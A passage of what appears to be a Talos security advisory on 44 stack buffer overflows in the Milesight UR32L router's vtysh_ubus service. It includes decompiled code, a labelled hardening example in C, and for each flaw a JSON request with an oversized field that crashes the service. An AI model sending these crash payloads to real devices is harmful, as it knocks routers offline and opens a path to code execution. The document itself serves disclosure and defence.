CVE-2023-25091,CVE-2023-25107,CVE-2023-25113,CVE-2023-25120,CVE-2023-25122,CVE-2023-25082,CVE-2023-25095,CVE-2023-25117,CVE-2023-25121,CVE-2023-25115,CVE-2023-25118,CVE-2023-25124,CVE-2023-25101,CVE-2023-25123,CVE-2023-25102,CVE-2023-25084,CVE-2023-25093,CVE-2023-25097,CVE-2023-25103,CVE-2023-25096,CVE-2023-25090,CVE-2023-25085,CVE-2023-25106,CVE-2023-25104,CVE-2023-25086,CVE-2023-25088,CVE-2023-25105,CVE-2023-25112,CVE-2023-25089,CVE-2023-25098,CVE-2023-25081,CVE-2023-25094,CVE-2023-25100,CVE-2023-25110,CVE-2023-25109,CVE-2023-25099,CVE-2023-25119,CVE-2023-25083,CVE-2023-25087,CVE-2023-25116,CVE-2023-25092,CVE-2023-25108,CVE-2023-25111,CVE-2023-25114
Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to arbitrary code execution. An attacker with high privileges can send HTTP requests to trigger these vulnerabilities.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Milesight UR32L v32.3.0.5
UR32L - https://www.milesight-iot.com/cellular/router/ur32l/
7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CWE-121 - Stack-based Buffer Overflow
The Milesight UR32L is an industrial cellular router. The router features include support for multiple VPNs, a router console shell, firewall and many others.
The Milesight router offers several functionalities through the /cgi endpoint. To call these functionalities, a POST request with the following template data is used:
{
"id": <number>,
"execute": <number>,
"core": "<core_name>",
"function": "<functionality>",
"values": [
{
<data>
}
]
}
Based on the value of the “core”, different classes of functionalities are reached. For instance, the yruo_vpn_openvpn_client “core” offers functions related to changing the OpenVPN client settings.
All the functions, regardless of the “core” and “function”, use the blobmsg structures for parsing the received data.
Many of these functions have a common pattern:
is_equal = strcmp(table_key,<key_value_one>);
if (is_equal == 0) {
command_argument_one = (char *)blobmsg_data(table_value);
}
else{
is_equal = strcmp(table_key,"<key_value_two>");
if (is_equal == 0) {
command_argument_two = (char *)blobmsg_data(table_value);
}
}
[...]
sprintf(vtysh_command_buff,command_format_string,command_argument_one,...);
exec_no_return_debug(vtysh_command_buff, callee_function_name, callee_function_line_number);
[...]
Essentially, the common pattern for these functions is a loop in which all the parameters are parsed from the blobmsg structures, after which a sprintf call composes a command for another service. Finally, the composed command is passed to exec_no_return_debug to actually execute it.
A common vulnerable pattern in vtysh_ubus is the use of sprintf with user-controllable data, which can lead to a buffer overflow. For each vulnerable function we found, the description of the individual vulnerability below shows which blobmsg keys are parsed and eventually reach the vulnerable sprintf call.
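The pattern above with the bounded counterpart a fix would use, as an added example that is not code from the advisory or from the vtysh_ubus binary: vtysh_format_checked replaces the unchecked sprintf with a truncation-checked vsnprintf, and the argument validator, the 256-byte buffer size, the 64-byte argument limit and the allowed-character set are assumptions chosen for illustration. It is written against the "firewall dmz %s %s" case, but the same wrapper applies to every sprintf site listed below.

```c
#include <ctype.h>
#include <stdarg.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Size of the fixed command buffer. The real size inside vtysh_ubus is not
 * stated in the advisory; 256 bytes is an assumed value for illustration. */
#define VTYSH_CMD_BUF_SIZE 256

/* Longest single argument we are willing to embed in a command (assumed). */
#define MAX_ARG_LEN 64

/* Bounded replacement for sprintf(vtysh_command_buff, fmt, ...): formats into
 * out[out_size], always NUL-terminates, and returns 0 on success or -1 if the
 * formatted command would not have fit (the overflow case). */
static int vtysh_format_checked(char *out, size_t out_size, const char *fmt, ...)
{
    va_list ap;
    int n;

    if (out == NULL || out_size == 0 || fmt == NULL)
        return -1;
    va_start(ap, fmt);
    n = vsnprintf(out, out_size, fmt, ap);
    va_end(ap);
    if (n < 0 || (size_t)n >= out_size) {
        /* Would have overflowed: clear the buffer so a caller that ignores the
         * return value never hands a half-built command to the executor. */
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Validates one user-controlled value (what blobmsg_get_string() returned for
 * a key) before it is embedded in a command line: present, non-empty, bounded
 * in length, and made only of characters that can form a single token. The
 * allow-list is an assumption for this example, not the router's own policy. */
static int vtysh_arg_is_valid(const char *arg)
{
    size_t len;

    if (arg == NULL)
        return 0;
    for (len = 0; arg[len] != '\0'; len++) {
        unsigned char c = (unsigned char)arg[len];
        if (len >= MAX_ARG_LEN)
            return 0;   /* too long: reject without scanning further */
        if (!(isalnum(c) || c == '.' || c == '-' || c == '_' || c == ':' || c == '/'))
            return 0;
    }
    return len > 0;
}

/* Hardened counterpart of the "firewall dmz %s %s" case: src_string and
 * dmz_string stand in for the values parsed from the "src" and "dmz" keys.
 * Returns 0 and fills out on success, -1 (with out emptied) otherwise. */
static int build_firewall_dmz_cmd(char *out, size_t out_size,
                                  const char *src_string, const char *dmz_string)
{
    if (out != NULL && out_size > 0)
        out[0] = '\0';
    if (!vtysh_arg_is_valid(src_string) || !vtysh_arg_is_valid(dmz_string))
        return -1;
    return vtysh_format_checked(out, out_size, "firewall dmz %s %s",
                                src_string, dmz_string);
}

/* Replays the shape of the advisory's crash input (a 0x300-byte "src" value,
 * constructed here) against the hardened builder and returns its verdict. */
static int reject_overlong_src(void)
{
    char overlong_src[0x300 + 1];
    char vtysh_command_buffer[VTYSH_CMD_BUF_SIZE];

    memset(overlong_src, 'A', 0x300);
    overlong_src[0x300] = '\0';
    return build_firewall_dmz_cmd(vtysh_command_buffer, sizeof vtysh_command_buffer,
                                  overlong_src, "POC");
}

int main(void)
{
    char vtysh_command_buffer[VTYSH_CMD_BUF_SIZE];

    if (build_firewall_dmz_cmd(vtysh_command_buffer, sizeof vtysh_command_buffer,
                               "192.168.1.10", "10.0.0.5") == 0)
        printf("accepted: %s\n", vtysh_command_buffer);
    printf("overlong src rejected: %s\n", reject_overlong_src() == -1 ? "yes" : "no");
    return 0;
}
```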
Note that the following vulnerabilities require the requests to be sent by a high privileged user.
In the firewall_handler_set function, the src and dmz JSON keys are used to fetch the respective values:
[...]
is_equal = strcmp(table_key,"src");
if (is_equal == 0) {
src_string = blobmsg_get_string(table_value);
}
else {
is_equal = strcmp(table_key,"dmz");
if (is_equal == 0) {
dmz_string = blobmsg_get_string(table_value);
}
}
[...]
Eventually the following portion of code is reached:
[...]
sprintf(vtysh_command_buffer,"firewall dmz %s %s",src_string,dmz_string);
[...]
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_firewall_mac_binding",
"function": "set",
"values": [
{
"base": "yruo_firewall_dmz",
"index": 1,
"value": {
"src": "A"*0x300,
"dmz": "POC"
}
}
]
}
In the firewall_handler_set function, the old_mac and old_ip JSON keys are used to fetch the respective values:
[...]
else {
is_equal = strcmp(table_key,"old_mac");
if (is_equal == 0) {
old_mac = (char *)blobmsg_get_string(table_value);
}
else {
is_equal = strcmp(table_key,"old_ip");
if (is_equal == 0) {
old_ip = (char *)blobmsg_get_string(table_value);
}
}
[...]
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"no firewall mac-binding %s %s",old_ip,old_mac);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_firewall_mac_binding",
"function": "set",
"values": [
{
"base": "yruo_firewall_mac_binding",
"index": 1,
"value": {
"old_ip": "A"*0x300,
"old_mac": "POC"
}
}
]
}
In the firewall_handler_set function, the ip and mac JSON keys are used to fetch the respective values:
[...]
is_equal = strcmp(table_key,"mac");
if (is_equal == 0) {
mac = (char *)blobmsg_get_string(table_value);
}
else {
is_equal_ = strcmp(table_key,"ip");
if (is_equal_ == 0) {
ip = (char *)blobmsg_get_string(table_value);
}
}
[...]
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"firewall mac-binding %s %s",ip,mac);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_firewall_mac_binding",
"function": "set",
"values": [
{
"base": "yruo_firewall_mac_binding",
"index": 1,
"value": {
"ip": "A"*0x300,
"mac": "POC"
}
}
]
}
In the firewall_handler_set function, the ip, mac and description JSON keys are used to fetch the respective values:
is_equal = strcmp(table_key,"mac");
if (is_equal == 0) {
mac = (char *)blobmsg_get_string(table_value);
}
else {
is_equal_ = strcmp(table_key,"ip");
if (is_equal_ == 0) {
ip = (char *)blobmsg_get_string(table_value);
}
else {
is_equal_ = strcmp(table_key,"description");
if (is_equal_ == 0) {
description = (char *)blobmsg_get_string(table_value);
}
[...]
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"firewall mac-binding %s %s description %s",ip,mac,description);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_firewall_mac_binding",
"function": "set",
"values": [
{
"base": "yruo_firewall_mac_binding",
"index": 1,
"value": {
"description": "A"*0x300,
"mac": "POC",
"ip": "1212",
}
}
]
}
In the firewall_handler_set function, the index and to_dst JSON keys are used to fetch the respective values:
[...]
is_string = strcmp(table_key,"to_dst");
if (is_string == 0) {
to_dst = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"index");
if (is_string == 0) {
index = blobmsg_get_u32(table_value);
}
[...]
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"firewall port-mapping index %d edit dip %s",index,to_dst);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_firewall_mac_binding",
"function": "set",
"values": [
{
"base": "yruo_firewall_port_mapping",
"index": 1,
"value": {
"to_dst": "A"*0x300,
"index": 1,
}
}
]
}
In the firewall_handler_set function, the index and dport JSON keys are used to fetch the respective values:
[...]
is_string = strcmp(table_key,"dport");
if (is_string == 0) {
dport = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"index");
if (is_string == 0) {
index = blobmsg_get_u32(table_value);
}
[...]
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"firewall port-mapping index %d edit dport %s",index,dport);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_firewall_mac_binding",
"function": "set",
"values": [
{
"base": "yruo_firewall_port_mapping",
"index": 1,
"value": {
"dport": "A"*0x300,
"index": 1,
}
}
]
}
In the firewall_handler_set function, the index and to_dport JSON keys are used to fetch the respective values:
[...]
is_string = strcmp(table_key,"to_dport");
if (is_string == 0) {
to_dport = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"index");
if (is_string == 0) {
index = blobmsg_get_u32(table_value);
}
[...]
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"firewall port-mapping index %d edit to-port %s",index,to_dport);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_firewall_mac_binding",
"function": "set",
"values": [
{
"base": "yruo_firewall_port_mapping",
"index": 1,
"value": {
"to_dport": "A"*0x300,
"index": 1,
}
}
]
}
In the firewall_handler_set function, the index and description JSON keys are used to fetch the respective values:
[...]
is_string = strcmp(table_key,"description");
if (is_string == 0) {
description = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"index");
if (is_string == 0) {
index = blobmsg_get_u32(table_value);
}
[...]
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"firewall port-mapping index %d edit description %s",index, description);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_firewall_mac_binding",
"function": "set",
"values": [
{
"base": "yruo_firewall_port_mapping",
"index": 1,
"value": {
"description": "A"*0x300,
"index": 1,
}
}
]
}
In the firewall_handler_set function, the interface JSON key is used to fetch the respective value:
[...]
is_equal = strcmp(table_key,"interface");
if (is_equal == 0) {
interface = (char *)blobmsg_get_string(table_value);
}
else {
is_equal = strcmp(table_key,"in_acl");
if (is_equal == 0) {
in_acl = blobmsg_get_u32(table_value);
}
[...]
This function will then call the handle_interface_acl function. Eventually the following portion of code is reached:
if (in_acl != -2) {
if (in_acl == -1) {
[...]
sprintf(vtysh_command_buffer,"no firewall-acl interface %s access-group in",interface);
[...]
}
[...]
}
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_firewall_mac_binding",
"function": "set",
"values": [
{
"base": "yruo_firewall_acl",
"index": 1,
"value": {
"interface": "A"*0x300,
"in_acl": -1,
}
}
]
}
In the firewall_handler_set function, the interface and in_acl JSON keys are used to fetch the respective values:
[...]
is_equal = strcmp(table_key,"interface");
if (is_equal == 0) {
interface = (char *)blobmsg_get_string(table_value);
}
else {
is_equal = strcmp(table_key,"in_acl");
if (is_equal == 0) {
in_acl = (char *)blobmsg_get_u32(table_value);
}
[...]
This function will then call the handle_interface_acl function. Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"firewall-acl interface %s access-group %d in",interface,in_acl);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_firewall_mac_binding",
"function": "set",
"values": [
{
"base": "yruo_firewall_acl",
"index": 1,
"value": {
"interface": "A"*0x300,
"in_acl": 10,
}
}
]
}
In the firewall_handler_set function, the interface JSON key is used to fetch its respective value:
[...]
is_equal = strcmp(table_key,"interface");
if (is_equal == 0) {
interface = (char *)blobmsg_get_string(table_value);
}
[...]
is_equal = strcmp(table_key,"out_acl");
if (is_equal == 0) {
out_acl = (char *)blobmsg_get_u32(table_value);
}
[...]
This function will then call the handle_interface_acl function. Eventually the following portion of code is reached:
if (out_acl != -2) {
if (out_acl == -1) {
[...]
sprintf(vtysh_command_buffer,"no firewall-acl interface %s access-group out",interface);
[...]
}
[...]
}
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_firewall_mac_binding",
"function": "set",
"values": [
{
"base": "yruo_firewall_acl",
"index": 1,
"value": {
"interface": "A"*0x300,
"out_acl":-1,
}
}
]
}
In the firewall_handler_set function, the interface and out_acl JSON keys are used to fetch the respective values:
[...]
is_equal = strcmp(table_key,"interface");
if (is_equal == 0) {
interface = (char *)blobmsg_get_string(table_value);
}
[...]
is_equal = strcmp(table_key,"out_acl");
if (is_equal == 0) {
out_acl = (char *)blobmsg_get_u32(table_value);
}
[...]
This function will then call the handle_interface_acl function. Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"firewall-acl interface %s access-group %d out",interface, out_acl);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_firewall_mac_binding",
"function": "set",
"values": [
{
"base": "yruo_firewall_acl",
"index": 1,
"value": {
"interface": "A"*0x300,
"out_acl":10,
}
}
]
}
The qos_handler_set function is the entry point for one of the functionalities. This function will eventually call the set_qos function.
In the set_qos function, the class_name JSON key is used to fetch its respective value:
is_string = strcmp(table_key,"class_name");
if (is_string == 0) {
class_name = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"action");
if (is_string == 0) {
action = blobmsg_get_u32(table_value);
}
[...]
if (action != -1 && class_name != (char *)0x0) {
if (action == 3) {
if (is_upload == 0) {
command_format_string = "no traffic download class %s";
}
else {
command_format_string = "no traffic upload class %s";
}
[...]
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,command_format_string,class_name);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_qos_download",
"function": "set",
"values": [
{
"base": "yruo_qos_upload",
"index": 1,
"value": {
"class_list":[{
"class_name":'A'*0x300,
"action":3,
}]
}
}
]
}
The qos_handler_set function is the entry point for one of the functionalities. This function will eventually call the set_qos function.
The set_qos function will call the into_class_node function. Eventually the following portion of code is reached:
if (is_upload == 0) {
command_format_string = "no traffic download class %s";
}
else {
command_format_string = "no traffic upload class %s";
}
sprintf(vtysh_command_buffer,command_format_string + 3,class_name);
The into_class_node function is called with two possible values:
if (action != -1 && class_name != (char *)0x0) {
if (action == 3) {
[...]
}
else {
if ((old_class_name == (char *)0x0) || (*old_class_name == '\0')) {
into_class_node(is_upload,class_name);
}
else {
into_class_node(is_upload,old_class_name);
[...]
}
[...]
}
In the set_qos function, the class_name and old_class_name JSON keys are used to fetch their respective values:
is_string = strcmp(table_key,"class_name");
if (is_string == 0) {
class_name = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"old_class_name");
if (is_string == 0) {
old_class_name = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(current_table_key,"action");
if (is_string == 0) {
action = blobmsg_get_u32(table_value);
}
[...]
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_qos_download",
"function": "set",
"values": [
{
"base": "yruo_qos_upload",
"index": 1,
"value": {
"class_list":[{
"class_name":'A'*0x300,
"action":2,
}]
}
}
]
}
The qos_handler_set function is the entry point for one of the functionalities. This function will eventually call the set_qos function.
In the set_qos function, the rule_name JSON key is used to fetch its respective value:
is_string = strcmp(table_key,"rule_name");
if (is_string == 0) {
rule_name = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"action");
if (is_string == 0) {
action = blobmsg_get_u32(table_value);
}
[...]
if (is_upload == 0) {
command_format_string = "no traffic download rule %s";
}
else {
command_format_string = "no traffic upload rule %s";
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,command_format_string,rule_name);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_qos_download",
"function": "set",
"values": [
{
"base": "yruo_qos_upload",
"index": 1,
"value": {
"rule_list":[{
"rule_name":'A'*0x300,
"action":3,
}]
}
}
]
}
The qos_handler_set function is the entry point for one of the functionalities. This function will eventually call the set_qos function.
In the set_qos function, the rule_name JSON key is used to fetch its respective value:
is_string = strcmp(table_key,"rule_name");
if (is_string == 0) {
rule_name = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"action");
if (is_string == 0) {
action = blobmsg_get_u32(table_value);
}
[...]
if (is_upload == 0) {
command_format_string = "no traffic download rule %s";
}
else {
command_format_string = "no traffic upload rule %s";
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,command_format_string + 3,rule_name);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_qos_download",
"function": "set",
"values": [
{
"base": "yruo_qos_upload",
"index": 1,
"value": {
"rule_list":[{
"rule_name":'A'*0x300,
"action":2,
}]
}
}
]
}
The qos_handler_set function is the entry point for one of the functionalities. This function will eventually call the set_qos function.
In the set_qos function, the attach_class JSON key is used to fetch its respective value:
is_string = strcmp(table_key,"attach_class");
if (is_string == 0) {
attach_class = blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"class_name");
if (is_string == 0) {
class_name = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"action");
if (is_string == 0) {
action = blobmsg_get_u32(table_value);
}
[...]
Eventually the following portion of code is reached:
if ((action != -1 && rule_name != (char *)0x0) && (*rule_name != '\0')) {
if (action == 3) {
[...]
}
else {
[...]
if (attach_class != 0) {
sprintf(vtysh_command_buffer,"match class %s",attach_class);
exec_cmd_no_return_debug(vtysh_command_buffer,"qos_ubus.c");
}
[...]
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_qos_download",
"function": "set",
"values": [
{
"base": "yruo_qos_upload",
"index": 1,
"value": {
"rule_list":[{
"attach_class":'A'*0x300,
'rule_name':'A',
"action":2,
}]
}
}
]
}
The qos_handler_set function is the entry point for one of the functionalities. This function will eventually call the set_qos function.
In the set_qos function, the source JSON key is used to fetch its respective value:
[...]
is_string = strcmp(table_key,"class_name");
if (is_string == 0) {
class_name = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"action");
if (is_string == 0) {
action = blobmsg_get_u32(table_value);
}
[...]
is_string = strcmp(table_key,"source");
if (is_string == 0) {
source = (char *)blobmsg_get_string(table_value);
}
[...]
Eventually the following portion of code is reached:
if ((action != -1 && rule_name != (char *)0x0) && (*rule_name != '\0')) {
if (action == 3) {
[...]
}
else {
[...]
if (source != 0) {
if (*source == 0) {
[...]
}
else{
sprintf(vtysh_command_buffer,"match source %s",source);
}
[...]
}
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_qos_download",
"function": "set",
"values": [
{
"base": "yruo_qos_upload",
"index": 1,
"value": {
"rule_list":[{
'rule_name':'A',
'source':'A'*0x300,
"action":2,
}]
}
}
]
}
The qos_handler_set function is the entry point for one of the functionalities. This function will eventually call the set_qos function.
In the set_qos function, the dest JSON key is used to fetch its respective value:
[...]
is_string = strcmp(table_key,"class_name");
if (is_string == 0) {
class_name = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"action");
if (is_string == 0) {
action = blobmsg_get_u32(table_value);
}
[...]
is_string = strcmp(table_key,"dest");
if (is_string == 0) {
dest = (char *)blobmsg_get_string(table_value);
}
[...]
Eventually the following portion of code is reached:
if ((action != -1 && rule_name != (char *)0x0) && (*rule_name != '\0')) {
if (action == 3) {
[...]
}
else {
[...]
if (dest != 0) {
if (*dest == 0) {
[...]
}
else{
sprintf(vtysh_command_buffer,"match destination %s",dest);
}
[...]
}
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_qos_download",
"function": "set",
"values": [
{
"base": "yruo_qos_upload",
"index": 1,
"value": {
"rule_list":[{
'rule_name':'A',
'dest':'A'*0x300,
"action":2,
}]
}
}
]
}
The qos_handler_set function is the entry point for one of the functionalities. This function will eventually call the set_qos function.
In the set_qos function, the default_class JSON key is used to fetch its respective value:
is_equal = strcmp(table_key,"rule_list");
if (((is_equal != 0) &&
(is_equal = strcmp(table_key,"class_list"), is_equal != 0)) &&
(is_equal = strcmp(table_key,"default_class"), is_equal == 0)) {
default_class = blobmsg_get_string(table_value);
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"default-class %s",default_class);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_qos_download",
"function": "set",
"values": [
{
"base": "yruo_qos_upload",
"index": 1,
"value": {
"default_class":"A"*0x300
}
}
]
}
The vpn_dmvpn_handler_set function is the entry point for one of the functionalities. This function will eventually call the set_dmvpn function.
In the set_dmvpn function, the gre_key JSON key is used to fetch its respective value:
is_equal = strcmp(table_key,"gre_key");
if (is_equal == 0) {
gre_key = (char *)blobmsg_get_string(table_value);
if (*gre_key != '\0') {
command_format_string = "tunnel key %s";
[...]
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,command_format_string,gre_key);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 6,
"execute": 1,
"core": "yruo_vpn_dmvpn",
"function": "set",
"values": [
{
"base": "yruo_vpn_dmvpn",
"index": 1,
"value": {
"gre_key":"A"*0x300
}
}
]
}
The vpn_dmvpn_handler_set function is the entry point for one of the functionalities. This function will eventually call the set_dmvpn function.
In the set_dmvpn function, the hub_ip and hub_gre_ip JSON keys are used to fetch their respective values:
is_equal = strcmp(table_key,"hub_ip");
if (is_equal == 0) {
hub_ip = (char *)blobmsg_get_string(table_value);
}
else {
is_equal = strcmp(table_key,"hub_gre_ip");
if (is_equal == 0) {
hub_gre_ip = (char *)blobmsg_get_string(table_value);
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"ip nhrp map %s %s",hub_ip,hub_gre_ip);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 6,
"execute": 1,
"core": "yruo_vpn_dmvpn",
"function": "set",
"values": [
{
"base": "yruo_vpn_dmvpn",
"index": 1,
"value": {
"hub_ip":"A"*0x300,
"hub_gre_ip":"POC"
}
}
]
}
The vpn_dmvpn_handler_set function is the entry point for one of the functionalities. This function will eventually call the set_dmvpn function.
In the set_dmvpn function, the gre_ip and gre_mask JSON keys are used to fetch their respective values:
is_equal = strcmp(table_key,"gre_ip");
if (is_equal == 0) {
gre_ip = (char *)blobmsg_get_string(table_value);
}
else {
is_equal = strcmp(table_key,"gre_mask");
if (is_equal == 0) {
gre_mask = (char *)blobmsg_get_string(table_value);
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"ip address %s %s",gre_ip,gre_mask);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 6,
"execute": 1,
"core": "yruo_vpn_dmvpn",
"function": "set",
"values": [
{
"base": "yruo_vpn_dmvpn",
"index": 1,
"value": {
"gre_ip":"A"*0x300,
"gre_mask":"POC"
}
}
]
}
The vpn_dmvpn_handler_set function is the entry point for one of the functionalities. This function will eventually call the set_ike_profile function.
In the set_ike_profile function, the username and password JSON keys are used to fetch their respective values:
is_equal = strcmp(table_key,"username");
if (is_equal == 0) {
username = (char *)blobmsg_get_string(table_value);
}
else {
is_equal = strcmp(table_key,"password");
if (is_equal == 0) {
password = (char *)blobmsg_get_string(table_value);
}
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"xauth username %s password %s",username,password);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 6,
"execute": 1,
"core": "yruo_vpn_dmvpn",
"function": "set",
"values": [
{
"base": "yruo_vpn_dmvpn",
"index": 1,
"value": {
"username":"A"*0x300,
"password":"POC"
}
}
]
}
The vpn_dmvpn_handler_set function is the entry point for one of the functionalities. This function will eventually call the set_ike_profile function.
In the set_ike_profile function, the secrets_remote JSON key is used to fetch its respective value:
is_equal = strcmp(table_key,"secrets_remote");
if (is_equal == 0) {
if(version != 1){
command_argument = blobmsg_get_string(table_value);
command_format_string = "pre-shared-key remote %s";
[...]
}
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,command_format_string,command_argument);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 7,
"execute": 1,
"core": "yruo_vpn_ipsec_client",
"function": "set",
"values": [
{
"base": "yruo_vpn_ipsec_client",
"index": 1,
"value": {
"secrets_remote": "A"*0x300,
"version": 2,
}
}
]
}
The vpn_gre_handler_set function is the entry point for one of the functionalities. This function will eventually call the set_gre function.
In the set_gre function, the local_virtual_ip and local_virtual_mask JSON keys are used to fetch their respective values:
is_equal = strcmp(table_key,"local_virtual_ip");
if (is_equal == 0) {
local_virtual_ip = (char *)blobmsg_get_string(table_value);
[...]
}
is_equal = strcmp(table_key,"local_virtual_mask");
if (is_equal == 0) {
local_virtual_mask = (char *)blobmsg_get_string(table_value);
[...]
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"ip address local %s %s",local_virtual_ip,local_virtual_mask);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_gre",
"function": "set",
"values": [
{
"base": "yruo_vpn_gre",
"index": 1,
"value": {
"local_virtual_ip": "A"*0x300,
"local_virtual_mask": "POC",
}
}
]
}
The vpn_gre_handler_set function is the entry point for one of the functionalities. This function will eventually call the set_gre function.
In the set_gre function, the remote_subnet and remote_mask JSON keys are used to fetch their respective values:
is_equal = strcmp(table_key,"remote_subnet");
if (is_equal == 0) {
remote_subnet = (char *)blobmsg_get_string(table_value);
}
else {
is_equal = strcmp(table_key,"remote_mask");
if (is_equal == 0) {
remote_mask = (char *)blobmsg_get_string(table_value);
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"remote subnet %s %s",remote_subnet,remote_mask);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_gre",
"function": "set",
"values": [
{
"base": "yruo_vpn_gre",
"index": 1,
"value": {
"remote_subnet": "A"*0x300,
"remote_mask": "POC",
}
}
]
}
The vpn_gre_handler_set function is the entry point for one of the functionalities. This function will eventually call the set_gre function.
In the set_gre function, the remote_ip JSON key is used to fetch its respective value:
